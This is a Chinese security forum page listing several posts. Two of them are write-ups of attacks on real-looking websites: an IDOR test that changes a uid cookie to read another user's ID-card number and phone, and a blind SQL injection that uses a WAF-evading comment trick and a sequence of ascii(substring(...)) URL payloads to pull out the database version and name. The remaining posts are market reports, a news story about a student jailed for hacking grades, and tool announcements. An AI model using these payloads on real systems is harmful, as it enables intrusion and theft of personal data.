漏洞实战挖掘之水平越权

渗透测试zksmile 发表了文章 • 2 个评论 • 181 次浏览 • 2018-09-24 14:32 • 来自相关话题

最近华住集团信息泄露事件闹的挺大的,看新闻貌似是抓到贩卖数据的人了。于是自己在某漏洞平台SRC上随手找了一个酒店类的厂商测试了一下。
 
在站点注册功能处,需要输入手机号、姓名、身份证号大量个人隐私信息。 




经过测试这里姓名、身份证可以不用输入也能注册,但是如果对于一些对于个人信息保护意识不强的人来说很容易信任该站点,把自己真实的身份信息填写进去。
 
这里我输入了一个虚假的手机号,和身份信息,后台未做任何校验,也没有向手机号发送验证码来校验,注册18888888888直接提示注册成功。 
 
注册成功之后登陆账号,访问自己的资料页面。 




可以看到页面上对身份证号码显示的地方做了 脱敏处理,本来我还想这个开发挺有经验的…..直到我右键查看源代码之后。 




由上图可以看出,页面中有一个隐藏的表单,此时完整的身份证号码就躺在value中,这岂不是掩耳盗铃?
由于此页面可以直接看到用户的姓名、身份证、电话号码信息,于是我就抓取了数据包想要测试一下是否有水平越权。 




在数据包HTTP请求的cookie处,我发现了如上图所示的信息。用户的信息就在cookie中明文传输。
此时使用cookie修改工具,将原本是107318的uid改为 107317 




刷新页面。直接可以越权查看到另外一个人的姓名、身份证、手机号。。。 




 
仅仅是修改一个uid不但可以越权查看个人的资料、酒店订单、收货地址、等等全部可以获取到。。。。。
 
到这一步我想也没必要往下测试了, 点了根雪qie陷入了思考之中。





  查看全部
最近华住集团信息泄露事件闹的挺大的,看新闻貌似是抓到贩卖数据的人了。于是自己在某漏洞平台SRC上随手找了一个酒店类的厂商测试了一下。
 
在站点注册功能处,需要输入手机号、姓名、身份证号大量个人隐私信息。 
1.png

经过测试这里姓名、身份证可以不用输入也能注册,但是如果对于一些对于个人信息保护意识不强的人来说很容易信任该站点,把自己真实的身份信息填写进去。
 
这里我输入了一个虚假的手机号,和身份信息,后台未做任何校验,也没有向手机号发送验证码来校验,注册18888888888直接提示注册成功。 
 
注册成功之后登陆账号,访问自己的资料页面。 
2.png

可以看到页面上对身份证号码显示的地方做了 脱敏处理,本来我还想这个开发挺有经验的…..直到我右键查看源代码之后。 
3.png

由上图可以看出,页面中有一个隐藏的表单,此时完整的身份证号码就躺在value中,这岂不是掩耳盗铃?
由于此页面可以直接看到用户的姓名、身份证、电话号码信息,于是我就抓取了数据包想要测试一下是否有水平越权。 
4.png

在数据包HTTP请求的cookie处,我发现了如上图所示的信息。用户的信息就在cookie中明文传输。
此时使用cookie修改工具,将原本是107318的uid改为 107317 
5.png

刷新页面。直接可以越权查看到另外一个人的姓名、身份证、手机号。。。 
6.png

 
仅仅是修改一个uid不但可以越权查看个人的资料、酒店订单、收货地址、等等全部可以获取到。。。。。
 
到这一步我想也没必要往下测试了, 点了根雪qie陷入了思考之中。

2NLD8Z0Q`TG{M_A9Q84Y188.jpg

 

【2017.08.07】安全文章

渗透测试 发表了文章 • 2 个评论 • 269 次浏览 • 2017-08-07 10:01 • 来自相关话题

Xssing Web Part - 2
 
Github信息泄露升级版案例
 
Docker 入门实战
 
Supervisord远程命令执行漏洞(CVE-2017-11610)
 
  查看全部

利用IIS特性绕过某waf SQL注入拦截

渗透测试Mosuan 发表了文章 • 5 个评论 • 908 次浏览 • 2017-03-06 13:07 • 来自相关话题

环境:asp.net+iis+access​
 
前几天朋友发给我一个注入叫我帮绕下waf,也不知道这个是不是waf,姑且称为waf吧。
 
 
环境:asp.net+iis+access​
 
前几天朋友发给我一个注入叫我帮绕下waf,也不知道这个是不是waf,姑且称为waf吧。
 
 

安全市场五巨头将面临新兴厂商的挑战

安全资讯kakaxi 发表了文章 • 0 个评论 • 391 次浏览 • 2017-02-10 13:19 • 来自相关话题

转载:安全牛

赛门铁克、思科、IBM、Check Point、英特尔,警钟已敲响~






2016年同比增长率11.5%的数据出台之后,市场研究公司科技商业研究(TBR)为来年的安全行业绘制了一幅崭新的蓝图——安全市场上现有的企业将受到新兴厂商的挑战。

展望未来,现有安全市场五巨头——赛门铁克、思科、IBM、Check Point和英特尔,将继续创新和兼并以维系未来5年的利润增长。

未来两年,安全市场将更快增长,到2018年将达12%的增幅。然而,到2021年,随着中型厂商在客户持续发展的安全策略中比重加大,这5巨头的单家市场份额都会缩水。尤其是, Palo Alto Networks、飞塔、趋势科技、火眼和Forcepoint都在扩张各自的安全市场份额。

受重大经济和政治变化的激发,这种改变将随市场增长在2017和2018年达到高点而发生。这些变化包括欧盟《通用数据保护条例》的启用,以及很多组织正在进行中的各种数字传输安全要求。因此,卖给公司、企业、公共产业和其他非消费客户的安全产品和托管安全服务,其全球总盈利在2016到2021年间将达11.7%。

尽管很多客户公司已经实现了强安全控制,改善了安全运营,达成了无缝合规和更快的检测时间,但网络罪犯也在发起更复杂和更具破坏性的攻击。所以,很多企业在未来5年都有计划增加安全投入,预计驱动安全市场从2016年的494亿美元增长到2021年的857亿美元。 查看全部
转载:安全牛

赛门铁克、思科、IBM、Check Point、英特尔,警钟已敲响~
3066fb8.jpg



2016年同比增长率11.5%的数据出台之后,市场研究公司科技商业研究(TBR)为来年的安全行业绘制了一幅崭新的蓝图——安全市场上现有的企业将受到新兴厂商的挑战。

展望未来,现有安全市场五巨头——赛门铁克、思科、IBM、Check Point和英特尔,将继续创新和兼并以维系未来5年的利润增长。

未来两年,安全市场将更快增长,到2018年将达12%的增幅。然而,到2021年,随着中型厂商在客户持续发展的安全策略中比重加大,这5巨头的单家市场份额都会缩水。尤其是, Palo Alto Networks、飞塔、趋势科技、火眼和Forcepoint都在扩张各自的安全市场份额。

受重大经济和政治变化的激发,这种改变将随市场增长在2017和2018年达到高点而发生。这些变化包括欧盟《通用数据保护条例》的启用,以及很多组织正在进行中的各种数字传输安全要求。因此,卖给公司、企业、公共产业和其他非消费客户的安全产品和托管安全服务,其全球总盈利在2016到2021年间将达11.7%。

尽管很多客户公司已经实现了强安全控制,改善了安全运营,达成了无缝合规和更快的检测时间,但网络罪犯也在发起更复杂和更具破坏性的攻击。所以,很多企业在未来5年都有计划增加安全投入,预计驱动安全市场从2016年的494亿美元增长到2021年的857亿美元。

记一次特殊的盲注SQL注入

Web安全渗透乌云很白 发表了文章 • 8 个评论 • 692 次浏览 • 2017-02-10 13:15 • 来自相关话题

无意中发现一个漏洞盒子厂商的网址http://www.xxxxx.com/content/index/4
输入http://www.xxxxx.com/content/index/4+1和http://www.xxxxx.com/content/index/5显示是一样的
输入http://www.xxxxx.com/content/index/4-1和http://www.xxxxx.com/content/index/3显示是一样的
初步判断,网址http://www.xxxxx.com/content/index/4处存在整型SQL注入
然后按照常规方法,输入http://www.xxxxx.com/content/index/4 and 1=1
直接出现404
经观察与测试,发现网站存在云锁
初步绕过云锁,这里采用把空格换成/**/
http://www.xxxxx.com/content/index/4//and//1=1
网页显示正常,然后继续深入
http://www.xxxxx.com/content/index/4//and//1=2
网页还是显示正常,这是咋回事呢?找不到原因,暂时归结为云锁的防护吧
这时候,咋办呢,瞬间渗透陷入僵局
然后多方求助,终于在某个群里得到了有价值的提示信息






http://www.xxxxx.com/content/index/ascii(substring(version(),1,1))-1和http://www.xxxxx.com/content/index/4和http://www.xxxxx.com/content/index/ascii('a')-93显示页面是一样的,说明数据库版本号第一位是5
http://www.xxxxx.com/content/index/substring(version(),3,1)和http://www.xxxxx.com/content/index/1显示页面一样,说明数据库第三位是1

http://www.xxxxx.com/content/index/ascii(substring(version(),1,1))-52与http://www.xxxxx.com/content/index/1一样,第一位5
http://www.xxxxx.com/content/index/ascii(substring(version(),2,1))-45与http://www.xxxxx.com/content/index/1一样,第二位是.
http://www.xxxxx.com/content/index/ascii(substring(version(),3,1))-48与http://www.xxxxx.com/content/index/1一样,第三位是1
http://www.xxxxx.com/content/index/ascii(substring(version(),4,1))-45与http://www.xxxxx.com/content/index/1一样,第四位是.
http://www.xxxxx.com/content/index/ascii(substring(version(),5,1))-53与http://www.xxxxx.com/content/index/1一样,第五位是6
MySQL5.1.6

http://www.xxxxx.com/content/index/ascii(substring(database(),1,1))-107与http://www.xxxxx.com/content/index/1显示一样,数据库第一位是l

http://www.xxxxx.com/content/index/1 品牌故事

http://www.xxxxx.com/content/index/2 成功案例,成功案例

http://www.xxxxx.com/content/index/3 HTML5建站

http://www.xxxxx.com/content/index/4 为什么要进行手机APP开发?

http://www.xxxxx.com/content/index/5 企业邮箱

http://www.xxxxx.com/content/index/6 联系方式

http://www.xxxxx.com/content/index/7 我们是谁

http://www.xxxxx.com/content/index/8 最新动态,品牌释义

http://www.xxxxx.com/content/index/9 最新动态,港湾文化

http://www.xxxxx.com/content/index/10 最新动态,资质荣誉

http://www.xxxxx.com/content/index/11 最新动态,新闻动态

http://www.xxxxx.com/content/index/12 最新动态,招贤纳士

http://www.xxxxx.com/content/index/13 成功案例,最新案例

http://www.xxxxx.com/content/index/14 成功案例,品牌网站

http://www.xxxxx.com/content/index/15 成功案例,开发案例

http://www.xxxxx.com/content/index/16 成功案例,商城案例

http://www.xxxxx.com/content/index/17 成功案例,h5案例

http://www.xxxxx.com/content/index/18 成功案例,app案例

http://www.xxxxx.com/content/index/19 成功案例,政府案例

http://www.xxxxx.com/content/index/20 成功案例,企业案例

http://www.xxxxx.com/content/index/21 成功案例,港湾案例

http://www.xxxxx.com/content/index/22 成功案例,设计前沿案例

http://www.xxxxx.com/content/index/23 成功案例,建站知识案例

http://www.xxxxx.com/content/index/24 邮箱功能

http://www.xxxxx.com/content/index/25 管理功能

http://www.xxxxx.com/content/index/26 企业邮箱介绍

http://www.xxxxx.com/content/index/27 常见问题

http://www.xxxxx.com/content/index/28 空白界面

http://www.xxxxx.com/content/index/29 微网站

http://www.xxxxx.com/content/index/30 集团站

http://www.xxxxx.com/content/index/31 平台开发

http://www.xxxxx.com/content/index/32 合作伙伴

http://www.xxxxx.com/content/index/33 厦门总公司

http://www.xxxxx.com/content/index/34 泉州分公司

http://www.xxxxx.com/content/index/35 武汉分公司

http://www.xxxxx.com/content/index/36 郑州分公司
http://www.xxxxx.com/content/index/ascii(substring(database(),2,1))-109与http://www.xxxxx.com/content/index/1一样,第二个是n
http://www.xxxxx.com/content/index/ascii(substring(database(),3,1))-100第三位e
http://www.xxxxx.com/content/index/ascii(substring(database(),4,1))-114 s
http://www.xxxxx.com/content/index/ascii(substring(database(),5,1))-115 t
http://www.xxxxx.com/content/index/ascii(substring(database(),6,1))-94 _
http://www.xxxxx.com/content/index/ascii(substring(database(),7,1))-98 c
http://www.xxxxx.com/content/index/ascii(substring(database(),8,1))-110 o
http://www.xxxxx.com/content/index/ascii(substring(database(),9,1))-108 m
数据库名称为:xxxxx_com 查看全部
无意中发现一个漏洞盒子厂商的网址http://www.xxxxx.com/content/index/4
输入http://www.xxxxx.com/content/index/4+1和http://www.xxxxx.com/content/index/5显示是一样的
输入http://www.xxxxx.com/content/index/4-1和http://www.xxxxx.com/content/index/3显示是一样的
初步判断,网址http://www.xxxxx.com/content/index/4处存在整型SQL注入
然后按照常规方法,输入http://www.xxxxx.com/content/index/4 and 1=1
直接出现404
经观察与测试,发现网站存在云锁
初步绕过云锁,这里采用把空格换成/**/
http://www.xxxxx.com/content/index/4//and//1=1
网页显示正常,然后继续深入
http://www.xxxxx.com/content/index/4//and//1=2
网页还是显示正常,这是咋回事呢?找不到原因,暂时归结为云锁的防护吧
这时候,咋办呢,瞬间渗透陷入僵局
然后多方求助,终于在某个群里得到了有价值的提示信息

QQ图片20170210114659.png


http://www.xxxxx.com/content/index/ascii(substring(version(),1,1))-1和http://www.xxxxx.com/content/index/4和http://www.xxxxx.com/content/index/ascii('a')-93显示页面是一样的,说明数据库版本号第一位是5
http://www.xxxxx.com/content/index/substring(version(),3,1)和http://www.xxxxx.com/content/index/1显示页面一样,说明数据库第三位是1

http://www.xxxxx.com/content/index/ascii(substring(version(),1,1))-52与http://www.xxxxx.com/content/index/1一样,第一位5
http://www.xxxxx.com/content/index/ascii(substring(version(),2,1))-45与http://www.xxxxx.com/content/index/1一样,第二位是.
http://www.xxxxx.com/content/index/ascii(substring(version(),3,1))-48与http://www.xxxxx.com/content/index/1一样,第三位是1
http://www.xxxxx.com/content/index/ascii(substring(version(),4,1))-45与http://www.xxxxx.com/content/index/1一样,第四位是.
http://www.xxxxx.com/content/index/ascii(substring(version(),5,1))-53与http://www.xxxxx.com/content/index/1一样,第五位是6
MySQL5.1.6

http://www.xxxxx.com/content/index/ascii(substring(database(),1,1))-107与http://www.xxxxx.com/content/index/1显示一样,数据库第一位是l

http://www.xxxxx.com/content/index/1 品牌故事

http://www.xxxxx.com/content/index/2 成功案例,成功案例

http://www.xxxxx.com/content/index/3 HTML5建站

http://www.xxxxx.com/content/index/4 为什么要进行手机APP开发?

http://www.xxxxx.com/content/index/5 企业邮箱

http://www.xxxxx.com/content/index/6 联系方式

http://www.xxxxx.com/content/index/7 我们是谁

http://www.xxxxx.com/content/index/8 最新动态,品牌释义

http://www.xxxxx.com/content/index/9 最新动态,港湾文化

http://www.xxxxx.com/content/index/10 最新动态,资质荣誉

http://www.xxxxx.com/content/index/11 最新动态,新闻动态

http://www.xxxxx.com/content/index/12 最新动态,招贤纳士

http://www.xxxxx.com/content/index/13 成功案例,最新案例

http://www.xxxxx.com/content/index/14 成功案例,品牌网站

http://www.xxxxx.com/content/index/15 成功案例,开发案例

http://www.xxxxx.com/content/index/16 成功案例,商城案例

http://www.xxxxx.com/content/index/17 成功案例,h5案例

http://www.xxxxx.com/content/index/18 成功案例,app案例

http://www.xxxxx.com/content/index/19 成功案例,政府案例

http://www.xxxxx.com/content/index/20 成功案例,企业案例

http://www.xxxxx.com/content/index/21 成功案例,港湾案例

http://www.xxxxx.com/content/index/22 成功案例,设计前沿案例

http://www.xxxxx.com/content/index/23 成功案例,建站知识案例

http://www.xxxxx.com/content/index/24 邮箱功能

http://www.xxxxx.com/content/index/25 管理功能

http://www.xxxxx.com/content/index/26 企业邮箱介绍

http://www.xxxxx.com/content/index/27 常见问题

http://www.xxxxx.com/content/index/28 空白界面

http://www.xxxxx.com/content/index/29 微网站

http://www.xxxxx.com/content/index/30 集团站

http://www.xxxxx.com/content/index/31 平台开发

http://www.xxxxx.com/content/index/32 合作伙伴

http://www.xxxxx.com/content/index/33 厦门总公司

http://www.xxxxx.com/content/index/34 泉州分公司

http://www.xxxxx.com/content/index/35 武汉分公司

http://www.xxxxx.com/content/index/36 郑州分公司
http://www.xxxxx.com/content/index/ascii(substring(database(),2,1))-109与http://www.xxxxx.com/content/index/1一样,第二个是n
http://www.xxxxx.com/content/index/ascii(substring(database(),3,1))-100第三位e
http://www.xxxxx.com/content/index/ascii(substring(database(),4,1))-114 s
http://www.xxxxx.com/content/index/ascii(substring(database(),5,1))-115 t
http://www.xxxxx.com/content/index/ascii(substring(database(),6,1))-94 _
http://www.xxxxx.com/content/index/ascii(substring(database(),7,1))-98 c
http://www.xxxxx.com/content/index/ascii(substring(database(),8,1))-110 o
http://www.xxxxx.com/content/index/ascii(substring(database(),9,1))-108 m
数据库名称为:xxxxx_com

2016年中国信息安全市场现状分析及发展趋势预测

安全资讯admin 发表了文章 • 5 个评论 • 477 次浏览 • 2017-01-19 12:08 • 来自相关话题

(原文转自:中国信息产业网  http://www.chyxx.com/industry/201607/429422.html)

由习主席亲自挂帅的国家安全委员会在2013年11月12日正式成立,并随后在2014年2月27日成立中共中央网络安全和信息化领导小组办公室,信息安全被提升到国家战略高度。我国信息安全行业2013年以前长期处于规模不大,增速不温不火的境地,再加上攻防技术和安全意识远远落后于国外,我国信息安全形势不容乐观。网络安全市场规模同国内IT总投入相比占比只有2%左右,远远落后发达国家10%~12%的平均水平。此次重要性获得前所未有的提升是行业发展的历史性机遇。   

相关报告:智研咨询发布的《2016-2022年中国信息安全市场运行态势及投资战略研究报告》


2014年我国信息安全投入占IT总投入比例和其他国家比较







    网络安全国家层面的较量早已有之,上升到国家战略高度后已经成为大国间交往的重要议题。习主席2015年访美时就将网络安全列为重要议题之一,并开启中美网络安全对话。而美国在网络安全上的国家层面大型计划早已有之,美国防部早在2006年底至2007年初就组建了全新的网络媒体战部队,布局网络攻防战。而世界主要大国及组织也很早就已经启动和布局网络安全建设。目前俄罗斯、以色列、伊朗、韩国等40多个国家也已相继成立了网络部队。北约C3局2012年签署了约5800万欧元的计算机事故反应能力(NCIRC)和全面作战能力(FOC)合同,是北约迄今为止最大的网络防御投资计划,而韩国也在同年投入19亿韩元启动“白色黑客”计划。在这样严峻的形势下,我国在国防层面的网络安全投入势必不断加大。

2013年之前已经曝光的美军网络攻防战布局







    除了政府层面信息安全形式严峻之外,大众消费者也因信息安全造成大量财产损失。据中国互联网协会6月23日发布的《2016中国网民权益保护调查报告》显示,从2015年下半年到2016年上半年的一年间,我国网民因垃圾信息、诈骗信息、个人信息泄露等遭受的经济损失高达915亿元。报告显示,54%的网民认为个人信息泄露情况严重,84%的网民曾亲身感受到由于个人信息泄露带来的不良影响。近一年来,我国网民因垃圾、诈骗信息、个人信息泄露等遭受的经济损失为人均133元,同比增加9元,因此而消耗的时间人均达3.6小时。其中,9%的网民经济损失在1000元以上。

    我们认为我国信息安全格局未来的走向将包括三个方面:

    1、棱镜门暴露出的美国依靠基础软硬件优势形成的网络霸权迫使我国更加重视信息安全,加大研发推广投入去IOE,逐步实现基础软硬件的全面国产化。

    2、维护国家安全、反恐与维护公民隐私权、人身自由之间将长期存在博弈与平衡,维护社会稳定更加不易,政府层面隐蔽监控与情报搜集投入力度将超以往。

    3、大国间网络攻防博弈加剧,规则制定需要跟上。对外,国家间交往需要逐步大成规范共识;对内,法律法规出台势在必行。信息安全行业将在新的标准和要求下新增大量需求。

    在此背景下,去年经过公开征求意见的《网络安全法草案》在6月27日至7月2日召开的十二届全国人大常委会第二十一次会议上将进行审议,有望近期很快落地,这将成为未来行业发展的重要文件。

    信息安全市场2013年预期将要提速,但2014年受反腐影响,政府、事业单位和国企采购以及信息安全行业政策的推出均低于预期。从2015年开始,随着国家政治生态的逐步稳定,行业迎来实质性的增速拐点,从目前的平均18%左右提升到25%~30%。2017年我国IT安全市场总规模有望超过450亿元,较2015年不到300亿元的行业规模提升超过50%。

2011-2017年我国信息安全市场规模及增速







    由于我国在信息安全领域资金、技术、意识都要落后于国外,我国网络安全市场长期由国外厂商把持。此次国家推动信息安全战略,终极目标是实现国产全面替代。据测算的总市场对应约有46亿市场可以进行国外产品的替代。而国内安全厂商已经具有信息安全全产业链的设计生产能力,且性能差距没有代差,在国内市场已经占据相当份额,甚至多数已成为行业领头羊,在国家政策的不断推动下全面替代可期。

国产替代空间测算




 


2014年我国网络安全细分市场份额    并购重组是行业发展大趋势,国产信息安全巨头有望孵化。参考成熟市场美国网络安全行业发展的轨迹,从2010年起行业并购重组迅速增多,10亿美元以上的并购案超过10个,基本上都是由传统软件巨头、大集成商、大芯片供应商和既有的安全企业巨头发起,我国信息安全产业也将逐步走向集中。 查看全部
(原文转自:中国信息产业网  http://www.chyxx.com/industry/201607/429422.html)

由习主席亲自挂帅的国家安全委员会在2013年11月12日正式成立,并随后在2014年2月27日成立中共中央网络安全和信息化领导小组办公室,信息安全被提升到国家战略高度。我国信息安全行业2013年以前长期处于规模不大,增速不温不火的境地,再加上攻防技术和安全意识远远落后于国外,我国信息安全形势不容乐观。网络安全市场规模同国内IT总投入相比占比只有2%左右,远远落后发达国家10%~12%的平均水平。此次重要性获得前所未有的提升是行业发展的历史性机遇。   


相关报告:智研咨询发布的《2016-2022年中国信息安全市场运行态势及投资战略研究报告》



2014年我国信息安全投入占IT总投入比例和其他国家比较

20160708163547_m.png




    网络安全国家层面的较量早已有之,上升到国家战略高度后已经成为大国间交往的重要议题。习主席2015年访美时就将网络安全列为重要议题之一,并开启中美网络安全对话。而美国在网络安全上的国家层面大型计划早已有之,美国防部早在2006年底至2007年初就组建了全新的网络媒体战部队,布局网络攻防战。而世界主要大国及组织也很早就已经启动和布局网络安全建设。目前俄罗斯、以色列、伊朗、韩国等40多个国家也已相继成立了网络部队。北约C3局2012年签署了约5800万欧元的计算机事故反应能力(NCIRC)和全面作战能力(FOC)合同,是北约迄今为止最大的网络防御投资计划,而韩国也在同年投入19亿韩元启动“白色黑客”计划。在这样严峻的形势下,我国在国防层面的网络安全投入势必不断加大。


2013年之前已经曝光的美军网络攻防战布局

20160708163547av_m.png




    除了政府层面信息安全形式严峻之外,大众消费者也因信息安全造成大量财产损失。据中国互联网协会6月23日发布的《2016中国网民权益保护调查报告》显示,从2015年下半年到2016年上半年的一年间,我国网民因垃圾信息、诈骗信息、个人信息泄露等遭受的经济损失高达915亿元。报告显示,54%的网民认为个人信息泄露情况严重,84%的网民曾亲身感受到由于个人信息泄露带来的不良影响。近一年来,我国网民因垃圾、诈骗信息、个人信息泄露等遭受的经济损失为人均133元,同比增加9元,因此而消耗的时间人均达3.6小时。其中,9%的网民经济损失在1000元以上。

    我们认为我国信息安全格局未来的走向将包括三个方面:

    1、棱镜门暴露出的美国依靠基础软硬件优势形成的网络霸权迫使我国更加重视信息安全,加大研发推广投入去IOE,逐步实现基础软硬件的全面国产化。

    2、维护国家安全、反恐与维护公民隐私权、人身自由之间将长期存在博弈与平衡,维护社会稳定更加不易,政府层面隐蔽监控与情报搜集投入力度将超以往。

    3、大国间网络攻防博弈加剧,规则制定需要跟上。对外,国家间交往需要逐步大成规范共识;对内,法律法规出台势在必行。信息安全行业将在新的标准和要求下新增大量需求。

    在此背景下,去年经过公开征求意见的《网络安全法草案》在6月27日至7月2日召开的十二届全国人大常委会第二十一次会议上将进行审议,有望近期很快落地,这将成为未来行业发展的重要文件。

    信息安全市场2013年预期将要提速,但2014年受反腐影响,政府、事业单位和国企采购以及信息安全行业政策的推出均低于预期。从2015年开始,随着国家政治生态的逐步稳定,行业迎来实质性的增速拐点,从目前的平均18%左右提升到25%~30%。2017年我国IT安全市场总规模有望超过450亿元,较2015年不到300亿元的行业规模提升超过50%。


2011-2017年我国信息安全市场规模及增速

20160708163548_m.png




    由于我国在信息安全领域资金、技术、意识都要落后于国外,我国网络安全市场长期由国外厂商把持。此次国家推动信息安全战略,终极目标是实现国产全面替代。据测算的总市场对应约有46亿市场可以进行国外产品的替代。而国内安全厂商已经具有信息安全全产业链的设计生产能力,且性能差距没有代差,在国内市场已经占据相当份额,甚至多数已成为行业领头羊,在国家政策的不断推动下全面替代可期。


国产替代空间测算

20160708163548qn_m.png

 



2014年我国网络安全细分市场份额    并购重组是行业发展大趋势,国产信息安全巨头有望孵化。参考成熟市场美国网络安全行业发展的轨迹,从2010年起行业并购重组迅速增多,10亿美元以上的并购案超过10个,基本上都是由传统软件巨头、大集成商、大芯片供应商和既有的安全企业巨头发起,我国信息安全产业也将逐步走向集中。

帮挂科生改成绩 大四“学霸”黑客获刑5年

安全资讯admin 发表了文章 • 5 个评论 • 395 次浏览 • 2017-01-09 11:33 • 来自相关话题

        与千万电脑爱好者一样,22岁的大学生小闫,喜欢网购、喜欢与朋友网络聊天。不同的是,这位来自达州的农村青年,大一提前学完4年计算机课程,大三成为高级软件开发工程师,还曾获省级、全国级计算机类大奖。
然而,从2016年开始,他频繁入侵四川多家高校的教务系统,并通过网络群、百度贴吧等平台招徕“生意”,以数百元不等的价格,替“挂科”学生篡改成绩,牟利达4.8万元。
1月5日,华西都市报记者从崇州检察院了解到,目前,小闫因破坏计算机信息系统罪,被判处有期徒刑五年。

多名挂科生成绩被人修改
     “老师,我看错成绩了。”2016年5月,四川崇州一家大专院校教务处的成老师,接连接到不少“挂科”学生的反映,称他们都看错成绩误报了重修,“希望能取消重新报名。”
“咋会有这么多学生看错?”带着疑惑的成老师,开始将教务系统成绩与线下的实际成绩对比,发现有10余位学生成绩对不上号。随后,他与科任老师们确定并未修改过成绩后,开始怀疑教务系统遭人入侵,恶意篡改了学生的考试成绩。
       与部分学生做了思想工作后,有学生当场道出了内幕:他们出钱在网上找人修改了成绩。当天,学校立即向崇州市公安局报案。接案后,当地公安迅速锁定了一个网名为“东瑜”的犯罪嫌疑人。

黑客改成绩一科收数百元
       “有没有挂科的同学要改成绩,想改的可以私聊我”。从2016年2月起,与四川多家院校有关的百度贴吧、聊天群中,开始出现一条“修改考试成绩”的广告。很快,一名挂科的大学生与小闫取得联系,一番讨价还价后,小闫答应以一科300元的价格,将该学生的考试成绩修改到及格。不久,这名挂科学生的成绩果然被修改。随后,小闫的名声在不少学生间传开,找他的人也越来越多。发现有“赚头”的小闫,收费价格也“水涨船高”,最多一科收800元。
警方通过汇款、取款等信息,锁定了犯罪嫌疑人小闫,并在成都将其挡获。在被抓前一晚,他仍在替几名学生修改成绩。据调查,小闫为四川某大专院校大四学生,被捕前通过该方式,已非法牟利4.8万余元。

成绩很优异同学赞他天才

   2岁的小闫,出生在达州一个小山村,打小就喜欢计算机的他,直到高中才有机会真正接触。
大学专业,他选择了计算机。“他很爱学习,也非常有天分。”小闫的大学老师说,他很多知识一点就通,在大一的时候,就基本自学完成了本科阶段的计算机课程。大三那年,他便成为高级软件开发工程师,还曾获得四川省计算机设计大赛一等奖、全国三等奖。“简直就是天才。”这是众多同学对他的评价。(崇检宣华西都市报-封面新闻记者杨力实习生陈琳) 查看全部
1483931732726.png

        与千万电脑爱好者一样,22岁的大学生小闫,喜欢网购、喜欢与朋友网络聊天。不同的是,这位来自达州的农村青年,大一提前学完4年计算机课程,大三成为高级软件开发工程师,还曾获省级、全国级计算机类大奖。
然而,从2016年开始,他频繁入侵四川多家高校的教务系统,并通过网络群、百度贴吧等平台招徕“生意”,以数百元不等的价格,替“挂科”学生篡改成绩,牟利达4.8万元。
1月5日,华西都市报记者从崇州检察院了解到,目前,小闫因破坏计算机信息系统罪,被判处有期徒刑五年。

多名挂科生成绩被人修改
     “老师,我看错成绩了。”2016年5月,四川崇州一家大专院校教务处的成老师,接连接到不少“挂科”学生的反映,称他们都看错成绩误报了重修,“希望能取消重新报名。”
“咋会有这么多学生看错?”带着疑惑的成老师,开始将教务系统成绩与线下的实际成绩对比,发现有10余位学生成绩对不上号。随后,他与科任老师们确定并未修改过成绩后,开始怀疑教务系统遭人入侵,恶意篡改了学生的考试成绩。
       与部分学生做了思想工作后,有学生当场道出了内幕:他们出钱在网上找人修改了成绩。当天,学校立即向崇州市公安局报案。接案后,当地公安迅速锁定了一个网名为“东瑜”的犯罪嫌疑人。

黑客改成绩一科收数百元
       “有没有挂科的同学要改成绩,想改的可以私聊我”。从2016年2月起,与四川多家院校有关的百度贴吧、聊天群中,开始出现一条“修改考试成绩”的广告。很快,一名挂科的大学生与小闫取得联系,一番讨价还价后,小闫答应以一科300元的价格,将该学生的考试成绩修改到及格。不久,这名挂科学生的成绩果然被修改。随后,小闫的名声在不少学生间传开,找他的人也越来越多。发现有“赚头”的小闫,收费价格也“水涨船高”,最多一科收800元。
警方通过汇款、取款等信息,锁定了犯罪嫌疑人小闫,并在成都将其挡获。在被抓前一晚,他仍在替几名学生修改成绩。据调查,小闫为四川某大专院校大四学生,被捕前通过该方式,已非法牟利4.8万余元。

成绩很优异同学赞他天才

   2岁的小闫,出生在达州一个小山村,打小就喜欢计算机的他,直到高中才有机会真正接触。
大学专业,他选择了计算机。“他很爱学习,也非常有天分。”小闫的大学老师说,他很多知识一点就通,在大一的时候,就基本自学完成了本科阶段的计算机课程。大三那年,他便成为高级软件开发工程师,还曾获得四川省计算机设计大赛一等奖、全国三等奖。“简直就是天才。”这是众多同学对他的评价。(崇检宣华西都市报-封面新闻记者杨力实习生陈琳)

SecIcode在线编码工具(内测版) V1

渗透测试Mosuan 发表了文章 • 5 个评论 • 536 次浏览 • 2017-01-05 18:45 • 来自相关话题

SecIcode在线编码工具(内测版) V1 -- 赛克艾威
 
SecIcode能干嘛,在线编码,十进制、十六进制、hex、url、base64等...
 
现在算是内测阶段,可能后面会加入很多功能,或者是修改很多bug...
 
代码不易,请勿瞎**copy。
 
html+css+javascript组成。
 
http://zone.secevery.com/code/index.html  在线体验,需要什么功能或者有兴趣维护再或者有什么bug的随时私聊我。
 





 
  查看全部
SecIcode在线编码工具(内测版) V1 -- 赛克艾威
 
SecIcode能干嘛,在线编码,十进制、十六进制、hex、url、base64等...
 
现在算是内测阶段,可能后面会加入很多功能,或者是修改很多bug...
 
代码不易,请勿瞎**copy。
 
html+css+javascript组成。
 
http://zone.secevery.com/code/index.html  在线体验,需要什么功能或者有兴趣维护再或者有什么bug的随时私聊我。
 

222222222222.png

 
 

【公告】社区封禁一些人

安全资讯Mosuan 发表了文章 • 0 个评论 • 412 次浏览 • 2016-12-14 14:47 • 来自相关话题

1.活跃分钟低于50的。
 
如果有误封的私聊我。
1.活跃分钟低于50的。
 
如果有误封的私聊我。

如何构建一个高效的代理池

编程Mosuan 回复了问题 • 6 人关注 • 2 个回复 • 837 次浏览 • 2016-12-07 16:43 • 来自相关话题